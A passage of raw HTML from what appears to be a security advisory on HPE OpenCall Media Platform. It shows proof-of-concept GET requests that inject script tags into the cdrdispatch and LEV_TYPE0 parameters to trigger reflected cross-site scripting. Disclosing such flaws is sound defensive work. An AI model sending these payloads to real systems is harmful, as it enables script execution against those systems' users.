class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-62\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">align<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;right&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-63\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">button <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;submit&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Log in&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;width:54px; margin-top:8px&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Login<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">button<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-64\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-65\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-66\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">table<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-67\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-68\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;background-color: #FFFFFF&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-69\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-70\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">table<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-71\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-72\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-73\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">table<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-74\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-75\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-76\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0200 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/VoiceXML-Administration-Tool-RFI.png\" data-slb-active=\"1\" data-slb-asset=\"1492312255\" data-slb-internal=\"0\" data-slb-group=\"3087\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3092\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/VoiceXML-Administration-Tool-RFI-300x169.png\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/VoiceXML-Administration-Tool-RFI-300x169.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/VoiceXML-Administration-Tool-RFI-768x432.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/VoiceXML-Administration-Tool-RFI-1024x576.png 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Platform Administration Tool &#8211; Reflected Cross-Site Scripting (XSS) that lead to arbitrary Javascript code execution<\/strong><br \/> HPE OpenCall Media Platform (OCMP) does not sanitize <em>cdrdispatch<\/em> function with parameter <em>cmd=DisplayBaseCdrBrowsePage<\/em>. An attacker can inject malicious javascript to trigger the Cross-Site Scripting (XSS).<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da8362a648262362\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/cdrdispatch?cmd=DisplayBaseCdrBrowsePagef5df3&lt;script&gt;alert(1)&lt;%2fscript&gt;1d8b4&amp;sessionType=NONE HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFMonitorMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8362a648262362-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8362a648262362-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8362a648262362-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8362a648262362-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8362a648262362-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8362a648262362-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8362a648262362-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8362a648262362-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8362a648262362-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8362a648262362-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da8362a648262362-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cdrdispatch<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">DisplayBaseCdrBrowsePagef5df3<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1d8b4<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">sessionType<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">NONE <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8362a648262362-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8362a648262362-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8362a648262362-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8362a648262362-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8362a648262362-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8362a648262362-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8362a648262362-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFMonitorMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8362a648262362-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8362a648262362-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0048 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>LEV_TYPE0<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize <em>GetMapAction<\/em> function parameter <em>LEV_TYPE0<\/em> input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL:<br \/> <em>\/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;<strong>LEV_TYPE0<\/strong>=T021985&#8243;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;0ca30&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83631817388389\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T021985&#8243;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;0ca30&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83631817388389-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83631817388389-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83631817388389-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83631817388389-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83631817388389-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83631817388389-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83631817388389-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83631817388389-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83631817388389-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83631817388389-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83631817388389-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">T021985<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0ca30<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83631817388389-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83631817388389-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83631817388389-4\"><span 